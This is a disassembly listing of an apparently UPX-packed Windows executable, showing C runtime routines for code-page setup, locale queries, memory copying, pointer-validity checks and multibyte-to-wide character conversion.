loc_420FF4: ; CODE XREF: UPX0:00421001�j
mov al, [edx]
or al, al
jz short loc_421003
add edx, 1
bts [esp], eax
jmp short loc_420FF4
; ---------------------------------------------------------------------------
loc_421003: ; CODE XREF: UPX0:00420FF8�j
mov esi, [ebp+8]
mov edi, edi
loc_421008: ; CODE XREF: UPX0:00421015�j
mov al, [esi]
or al, al
jz short loc_42101A
add esi, 1
bt [esp], eax
jnb short loc_421008
lea eax, [esi-1]
loc_42101A: ; CODE XREF: UPX0:0042100C�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_421020 proc near ; CODE XREF: sub_421204+FC�p
; sub_421204+146�p
sub eax, 3A4h
jz short loc_421049
sub eax, 4
jz short loc_421043
sub eax, 0Dh
jz short loc_42103D
dec eax
jz short loc_421037
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_421037: ; CODE XREF: sub_421020+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_42103D: ; CODE XREF: sub_421020+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_421043: ; CODE XREF: sub_421020+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_421049: ; CODE XREF: sub_421020+5�j
mov eax, 411h
retn
sub_421020 endp
; =============== S U B R O U T I N E =======================================
sub_42104F proc near ; CODE XREF: sub_421204:loc_421376�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47C400
rep stosd
stosb
xor eax, eax
mov ds:dword_47C504, eax
mov ds:dword_47C3E0, eax
mov ds:dword_47C3D8, eax
mov edi, offset word_47C510
stosd
stosd
stosd
pop edi
retn
sub_42104F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421078 proc near ; CODE XREF: sub_421204:loc_42137B�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_42A290
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_18]
push eax
push ds:dword_47C504
call dword_424044 ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_4211B5
xor eax, eax
loc_4210AA: ; CODE XREF: sub_421078+3C�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_4210AA
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_4210FA
push ebx
lea edx, [ebp+var_11]
push edi
loc_4210C9: ; CODE XREF: sub_421078+7E�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_4210F0
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_4210F0: ; CODE XREF: sub_421078+59�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_4210C9
pop edi
pop ebx
loc_4210FA: ; CODE XREF: sub_421078+4A�j
push 0
push ds:dword_47C3D8
lea eax, [ebp+var_518]
push ds:dword_47C504
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_420DD8
push 0
push ds:dword_47C504
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push ds:dword_47C3D8
call sub_41C18B
push 0
push ds:dword_47C504
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push ds:dword_47C3D8
call sub_41C18B
add esp, 5Ch
xor eax, eax
loc_42116F: ; CODE XREF: sub_421078+139�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_421192
or ds:byte_47C401[eax], 10h
mov cl, [ebp+eax+var_218]
loc_42118A: ; CODE XREF: sub_421078+12D�j
mov ds:byte_47C520[eax], cl
jmp short loc_4211AE
; ---------------------------------------------------------------------------
loc_421192: ; CODE XREF: sub_421078+102�j
test cl, 2
jz short loc_4211A7
or ds:byte_47C401[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_42118A
; ---------------------------------------------------------------------------
loc_4211A7: ; CODE XREF: sub_421078+11D�j
mov ds:byte_47C520[eax], 0
loc_4211AE: ; CODE XREF: sub_421078+118�j
inc eax
cmp eax, esi
jb short loc_42116F
jmp short loc_4211F9
; ---------------------------------------------------------------------------
loc_4211B5: ; CODE XREF: sub_421078+2A�j
xor eax, eax
loc_4211B7: ; CODE XREF: sub_421078+17F�j
cmp eax, 41h
jb short loc_4211D5
cmp eax, 5Ah
ja short loc_4211D5
or ds:byte_47C401[eax], 10h
mov cl, al
add cl, 20h
loc_4211CD: ; CODE XREF: sub_421078+173�j
mov ds:byte_47C520[eax], cl
jmp short loc_4211F4
; ---------------------------------------------------------------------------
loc_4211D5: ; CODE XREF: sub_421078+142�j
; sub_421078+147�j
cmp eax, 61h
jb short loc_4211ED
cmp eax, 7Ah
ja short loc_4211ED
or ds:byte_47C401[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_4211CD
; ---------------------------------------------------------------------------
loc_4211ED: ; CODE XREF: sub_421078+160�j
; sub_421078+165�j
mov ds:byte_47C520[eax], 0
loc_4211F4: ; CODE XREF: sub_421078+15B�j
inc eax
cmp eax, esi
jb short loc_4211B7
loc_4211F9: ; CODE XREF: sub_421078+13B�j
mov ecx, [ebp+var_4]
pop esi
call sub_4192B6
leave
retn
sub_421078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421204 proc near ; CODE XREF: sub_421394+9F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_42A290
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_4], eax
push edi
jz loc_421376
xor edx, edx
xor eax, eax
loc_421226: ; CODE XREF: sub_421204+33�j
cmp dword_42AC18[eax], esi
jz short loc_421293
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_421226
lea eax, [ebp+var_18]
push eax
push esi
call dword_424044 ; GetCPInfo
cmp eax, 1
jnz loc_42136E
push 40h
xor eax, eax
cmp [ebp+var_18], 1
pop ecx
mov edi, offset byte_47C400
rep stosd
stosb
mov ds:dword_47C504, esi
mov ds:dword_47C3D8, ebx
jbe loc_42135C
cmp [ebp+var_12], 0
jz loc_421334
lea ecx, [ebp+var_11]
loc_42127D: ; CODE XREF: sub_421204+12A�j
mov dl, [ecx]
test dl, dl
jz loc_421334
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_421324
; ---------------------------------------------------------------------------
loc_421293: ; CODE XREF: sub_421204+28�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47C400
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_1C], ebx
stosb
lea ebx, dword_42AC28[ecx]
loc_4212AF: ; CODE XREF: sub_421204+E8�j
mov al, [ebx]
mov esi, ebx
jmp short loc_4212DE
; ---------------------------------------------------------------------------
loc_4212B5: ; CODE XREF: sub_421204+DC�j
mov dl, [esi+1]
test dl, dl
jz short loc_4212E2
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_4212DA
mov edx, [ebp+var_1C]
mov dl, byte_42AC10[edx]
loc_4212CF: ; CODE XREF: sub_421204+D4�j
or ds:byte_47C401[eax], dl
inc eax
cmp eax, edi
jbe short loc_4212CF
loc_4212DA: ; CODE XREF: sub_421204+C0�j
inc esi
inc esi
mov al, [esi]
loc_4212DE: ; CODE XREF: sub_421204+AF�j
test al, al
jnz short loc_4212B5
loc_4212E2: ; CODE XREF: sub_421204+B6�j
inc [ebp+var_1C]
add ebx, 8
cmp [ebp+var_1C], 4
jb short loc_4212AF
mov eax, [ebp+arg_0]
mov ds:dword_47C504, eax
mov ds:dword_47C3E0, 1
call sub_421020
lea ecx, dword_42AC1C[ecx]
mov esi, ecx
mov edi, offset word_47C510
movsd
movsd
mov ds:dword_47C3D8, eax
movsd
jmp short loc_42137B
; ---------------------------------------------------------------------------
loc_42131C: ; CODE XREF: sub_421204+122�j
or ds:byte_47C401[eax], 4
inc eax
loc_421324: ; CODE XREF: sub_421204+8A�j
cmp eax, edx
jbe short loc_42131C
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_42127D
loc_421334: ; CODE XREF: sub_421204+70�j
; sub_421204+7D�j
xor ecx, ecx
inc ecx
mov eax, ecx
loc_421339: ; CODE XREF: sub_421204+142�j
or ds:byte_47C401[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_421339
mov eax, esi
call sub_421020
mov ds:dword_47C3D8, eax
mov ds:dword_47C3E0, ecx
jmp short loc_421362
; ---------------------------------------------------------------------------
loc_42135C: ; CODE XREF: sub_421204+66�j
mov ds:dword_47C3E0, ebx
loc_421362: ; CODE XREF: sub_421204+156�j
xor eax, eax
mov edi, offset word_47C510
stosd
stosd
stosd
jmp short loc_42137B
; ---------------------------------------------------------------------------
loc_42136E: ; CODE XREF: sub_421204+43�j
cmp dword_44C284, ebx
jz short loc_421384
loc_421376: ; CODE XREF: sub_421204+18�j
call sub_42104F
loc_42137B: ; CODE XREF: sub_421204+116�j
; sub_421204+168�j
call sub_421078
xor eax, eax
jmp short loc_421387
; ---------------------------------------------------------------------------
loc_421384: ; CODE XREF: sub_421204+170�j
or eax, 0FFFFFFFFh
loc_421387: ; CODE XREF: sub_421204+17E�j
mov ecx, [ebp+var_4]
pop edi
pop esi
pop ebx
call sub_4192B6
leave
retn
sub_421204 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421394 proc near ; CODE XREF: sub_4214E4+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 14h
push offset stru_426028
call __SEH_prolog
or [ebp+var_20], 0FFFFFFFFh
push 0Dh
call sub_41D0E7
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov dword_44C284, edi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_4213D1
mov dword_44C284, 1
call dword_424030 ; GetOEMCP
jmp short loc_4213FC
; ---------------------------------------------------------------------------
loc_4213D1: ; CODE XREF: sub_421394+29�j
cmp eax, 0FFFFFFFDh
jnz short loc_4213E8
mov dword_44C284, 1
call dword_424034 ; GetACP
jmp short loc_4213FC
; ---------------------------------------------------------------------------
loc_4213E8: ; CODE XREF: sub_421394+40�j
cmp eax, 0FFFFFFFCh
jnz short loc_4213FC
mov dword_44C284, 1
mov eax, dword_44C1C4
loc_4213FC: ; CODE XREF: sub_421394+3B�j
; sub_421394+52�j ...
mov [ebp+arg_0], eax
cmp eax, ds:dword_47C504
jz loc_4214C6
mov esi, ds:dword_47C3DC
mov [ebp+var_24], esi
cmp esi, edi
jz short loc_42141C
cmp [esi], edi
jz short loc_42142C
loc_42141C: ; CODE XREF: sub_421394+82�j
push 220h
call sub_419DCB
pop ecx
mov esi, eax
mov [ebp+var_24], esi
loc_42142C: ; CODE XREF: sub_421394+86�j
cmp esi, edi
jz short loc_4214AF
push [ebp+arg_0]
call sub_421204
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jnz short loc_4214AF
mov [esi], edi
mov eax, ds:dword_47C504
mov [esi+4], eax
mov eax, ds:dword_47C3E0
mov [esi+8], eax
mov eax, ds:dword_47C3D8
mov [esi+0Ch], eax
xor eax, eax
loc_42145C: ; CODE XREF: sub_421394+DE�j
mov [ebp+var_1C], eax
cmp eax, 5
jge short loc_421474
mov cx, ds:word_47C510[eax*2]
mov [esi+eax*2+10h], cx
inc eax
jmp short loc_42145C
; ---------------------------------------------------------------------------
loc_421474: ; CODE XREF: sub_421394+CE�j
xor eax, eax
loc_421476: ; CODE XREF: sub_421394+F7�j
mov [ebp+var_1C], eax
cmp eax, 101h
jge short loc_42148D
mov cl, ds:byte_47C400[eax]
mov [eax+esi+1Ch], cl
inc eax
jmp short loc_421476
; ---------------------------------------------------------------------------
loc_42148D: ; CODE XREF: sub_421394+EA�j
xor eax, eax
loc_42148F: ; CODE XREF: sub_421394+113�j
mov [ebp+var_1C], eax
cmp eax, 100h
jge short loc_4214A9
mov cl, ds:byte_47C520[eax]
mov [eax+esi+11Dh], cl
inc eax
jmp short loc_42148F
; ---------------------------------------------------------------------------
loc_4214A9: ; CODE XREF: sub_421394+103�j
mov ds:dword_47C3DC, esi
loc_4214AF: ; CODE XREF: sub_421394+9A�j
; sub_421394+AA�j
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4214C9
cmp esi, ds:dword_47C3DC
jz short loc_4214C9
push esi
call sub_419DDD
pop ecx
jmp short loc_4214C9
; ---------------------------------------------------------------------------
loc_4214C6: ; CODE XREF: sub_421394+71�j
mov [ebp+var_20], edi
loc_4214C9: ; CODE XREF: sub_421394+11F�j
; sub_421394+127�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4214DB
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_421394 endp
; =============== S U B R O U T I N E =======================================
sub_4214DB proc near ; CODE XREF: sub_421394+139�p
; DATA XREF: UPX0:stru_426028�o
push 0Dh
call sub_41D032
pop ecx
retn
sub_4214DB endp
; =============== S U B R O U T I N E =======================================
sub_4214E4 proc near ; CODE XREF: sub_41FE4F+C�p
; sub_41FEAC+D�p ...
cmp ds:dword_47C74C, 0
jnz short loc_4214FF
push 0FFFFFFFDh
call sub_421394
pop ecx
mov ds:dword_47C74C, 1
loc_4214FF: ; CODE XREF: sub_4214E4+7�j
xor eax, eax
retn
sub_4214E4 endp
; =============== S U B R O U T I N E =======================================
sub_421502 proc near ; CODE XREF: sub_41B93A+53�p
; sub_41B93A+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call dword_42402C ; IsBadReadPtr
test eax, eax
jz short loc_42151A
xor esi, esi
loc_42151A: ; CODE XREF: sub_421502+14�j
mov eax, esi
pop esi
retn
sub_421502 endp
; =============== S U B R O U T I N E =======================================
sub_42151E proc near ; CODE XREF: sub_41B93A+65�p
; sub_41B93A+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call dword_424160 ; IsBadWritePtr
test eax, eax
jz short loc_421536
xor esi, esi
loc_421536: ; CODE XREF: sub_42151E+14�j
mov eax, esi
pop esi
retn
sub_42151E endp
; =============== S U B R O U T I N E =======================================
sub_42153A proc near ; CODE XREF: sub_41B93A+128�p
; sub_41EC16+35�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
xor esi, esi
inc esi
call dword_424028 ; IsBadCodePtr
test eax, eax
jz short loc_42154E
xor esi, esi
loc_42154E: ; CODE XREF: sub_42153A+10�j
mov eax, esi
pop esi
retn
sub_42153A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421560 proc near ; CODE XREF: sub_41B93A+B5�p
; sub_41B93A+102�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_421580
cmp edi, eax
jb loc_4216FC
loc_421580: ; CODE XREF: sub_421560+16�j
test edi, 3
jnz short loc_42159C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4215BC
rep movsd
jmp off_4216AC[edx*4]
; ---------------------------------------------------------------------------
loc_42159C: ; CODE XREF: sub_421560+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4215B4
and eax, 3
add ecx, eax
jmp dword ptr loc_4215BC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4215B4: ; CODE XREF: sub_421560+46�j
jmp dword ptr loc_4216BC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4215BC: ; CODE XREF: sub_421560+31�j
; sub_421560+8E�j ...
jmp off_421640[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4215D0
dd offset loc_4215FC
dd offset loc_421620
; ---------------------------------------------------------------------------
loc_4215D0: ; DATA XREF: sub_421560+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4215BC
rep movsd
jmp off_4216AC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4215FC: ; DATA XREF: sub_421560+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4215BC
rep movsd
jmp off_4216AC[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_421620: ; DATA XREF: sub_421560+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_4215BC
rep movsd
jmp off_4216AC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_421640 dd offset loc_4216A3 ; DATA XREF: sub_421560:loc_4215BC�r
dd offset loc_421690
dd offset loc_421688
dd offset loc_421680
dd offset loc_421678
dd offset loc_421670
dd offset loc_421668
dd offset loc_421660
; ---------------------------------------------------------------------------
loc_421660: ; CODE XREF: sub_421560:loc_4215BC�j
; DATA XREF: sub_421560+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_421668: ; CODE XREF: sub_421560:loc_4215BC�j
; DATA XREF: sub_421560+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_421670: ; CODE XREF: sub_421560:loc_4215BC�j
; DATA XREF: sub_421560+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_421678: ; CODE XREF: sub_421560:loc_4215BC�j
; DATA XREF: sub_421560+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_421680: ; CODE XREF: sub_421560:loc_4215BC�j
; DATA XREF: sub_421560+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_421688: ; CODE XREF: sub_421560:loc_4215BC�j
; DATA XREF: sub_421560+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_421690: ; CODE XREF: sub_421560:loc_4215BC�j
; DATA XREF: sub_421560+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4216A3: ; CODE XREF: sub_421560:loc_4215BC�j
; DATA XREF: sub_421560:off_421640�o
jmp off_4216AC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4216AC dd offset loc_4216BC ; DATA XREF: sub_421560+35�r
; sub_421560+92�r ...
dd offset loc_4216C4
dd offset loc_4216D0
dd offset loc_4216E4
; ---------------------------------------------------------------------------
loc_4216BC: ; CODE XREF: sub_421560+35�j
; sub_421560+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4216C4: ; CODE XREF: sub_421560+35�j
; sub_421560+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4216D0: ; CODE XREF: sub_421560+35�j
; sub_421560+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4216E4: ; CODE XREF: sub_421560+35�j
; sub_421560+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4216FC: ; CODE XREF: sub_421560+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_421730
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_421724
std
rep movsd
cld
jmp off_421848[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_421724: ; CODE XREF: sub_421560+1B5�j
; sub_421560+210�j ...
neg ecx
jmp dword ptr loc_4217F7+1[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_421730: ; CODE XREF: sub_421560+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_421748
and eax, 3
sub ecx, eax
jmp dword ptr loc_421748+4[eax*4]
; ---------------------------------------------------------------------------
loc_421748: ; CODE XREF: sub_421560+1DA�j
; DATA XREF: sub_421560+1E1�r
jmp off_421848[ecx*4]
; ---------------------------------------------------------------------------
align 10h
pop esp
pop ss
inc edx
add [eax-57FFBDE9h], al
pop ss
inc edx
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_421724
std
rep movsd
cld
jmp off_421848[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_421724
std
rep movsd
cld
jmp off_421848[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_421724
std
rep movsd
cld
jmp off_421848[edx*4]
; ---------------------------------------------------------------------------
align 4
cld
pop ss
inc edx
add [eax+ebx], al
inc edx
add [eax+ebx], cl
inc edx
add [eax+ebx], dl
inc edx
add [eax+ebx], bl
inc edx
add [eax+ebx], ah
inc edx
add [eax+ebx], ch
inc edx
loc_4217F7: ; DATA XREF: sub_421560+1C6�r
add [edi], bh
sbb [edx+0], al
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42183F: ; CODE XREF: sub_421560+1C6�j
jmp off_421848[edx*4]
; ---------------------------------------------------------------------------
align 4
off_421848 dd offset loc_421858 ; DATA XREF: sub_421560+1BB�r
; sub_421560:loc_421748�r ...
dd offset loc_421860
dd offset loc_421870
dd offset loc_421884
; ---------------------------------------------------------------------------
loc_421858: ; CODE XREF: sub_421560+1BB�j
; sub_421560:loc_421748�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_421860: ; CODE XREF: sub_421560+1BB�j
; sub_421560:loc_421748�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_421870: ; CODE XREF: sub_421560+1BB�j
; sub_421560:loc_421748�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_421884: ; CODE XREF: sub_421560+1BB�j
; sub_421560:loc_421748�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_421560 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41BE81
loc_42189D: ; CODE XREF: sub_41BE81:loc_41BEB1�j
push 0Ah
call sub_41FB3B
push 16h
call sub_4228AF
pop ecx
pop ecx
push 3
call sub_41EB71
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41BE81
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4218B5 proc near ; CODE XREF: sub_41C18B+27D�p
; sub_420DD8+15E�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_42A290
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call dword_424040 ; GetLocaleInfoA
test eax, eax
jnz short loc_4218E4
or eax, 0FFFFFFFFh
jmp short loc_4218EE
; ---------------------------------------------------------------------------
loc_4218E4: ; CODE XREF: sub_4218B5+28�j
lea eax, [ebp+var_C]
push eax
call sub_419BE2
pop ecx
loc_4218EE: ; CODE XREF: sub_4218B5+2D�j
mov ecx, [ebp+var_4]
call sub_4192B6
leave
retn
sub_4218B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4218F8 proc near ; CODE XREF: sub_41C18B+2A8�p
; sub_41C18B+366�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 38h
push offset stru_426038
call __SEH_prolog
mov eax, dword_42A290
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_34], edi
mov [ebp+var_44], edi
mov eax, [ebp+arg_C]
mov ebx, [eax]
mov [ebp+var_40], ebx
mov [ebp+var_3C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jz loc_421A9E
lea ecx, [ebp+var_30]
push ecx
push eax
mov esi, dword_424044
call esi ; GetCPInfo
test eax, eax
jz short loc_42195C
cmp [ebp+var_30], 1
jnz short loc_42195C
lea eax, [ebp+var_30]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_42195C
cmp [ebp+var_30], 1
jnz short loc_42195C
mov [ebp+var_3C], 1
loc_42195C: ; CODE XREF: sub_4218F8+42�j
; sub_4218F8+48�j ...
cmp [ebp+var_3C], edi
jz short loc_42197B
cmp ebx, 0FFFFFFFFh
jz short loc_42196A
mov esi, ebx
jmp short loc_421976
; ---------------------------------------------------------------------------
loc_42196A: ; CODE XREF: sub_4218F8+6C�j
push [ebp+arg_8]
call sub_41FAB0
pop ecx
mov esi, eax
inc esi
loc_421976: ; CODE XREF: sub_4218F8+70�j
mov [ebp+var_38], esi
jmp short loc_42197E
; ---------------------------------------------------------------------------
loc_42197B: ; CODE XREF: sub_4218F8+67�j
mov esi, [ebp+var_38]
loc_42197E: ; CODE XREF: sub_4218F8+81�j
cmp [ebp+var_3C], edi
jnz short loc_42199D
push edi
push edi
push ebx
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call dword_4240FC ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_38], esi
cmp esi, edi
jz short loc_4219F5
loc_42199D: ; CODE XREF: sub_4218F8+89�j
mov [ebp+ms_exc.disabled], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_4192D0
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_48], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_420CC0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4219E1
; ---------------------------------------------------------------------------
loc_4219CA: ; DATA XREF: UPX0:stru_426038�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4219CE: ; DATA XREF: UPX0:stru_426038�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0A8
xor edi, edi
xor ebx, ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_38]
loc_4219E1: ; CODE XREF: sub_4218F8+D0�j
cmp ebx, edi
jnz short loc_421A03
push esi
push 2
call sub_420529
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_4219FC
loc_4219F5: ; CODE XREF: sub_4218F8+A3�j
xor eax, eax
jmp loc_421AB0
; ---------------------------------------------------------------------------
loc_4219FC: ; CODE XREF: sub_4218F8+FB�j
mov [ebp+var_44], 1
loc_421A03: ; CODE XREF: sub_4218F8+EB�j
push esi
push ebx
push [ebp+var_40]
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call dword_4240FC ; MultiByteToWideChar
test eax, eax
jz loc_421AA1
cmp [ebp+arg_10], edi
jz short loc_421A43
push edi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_42410C ; WideCharToMultiByte
test eax, eax
jz short loc_421AA1
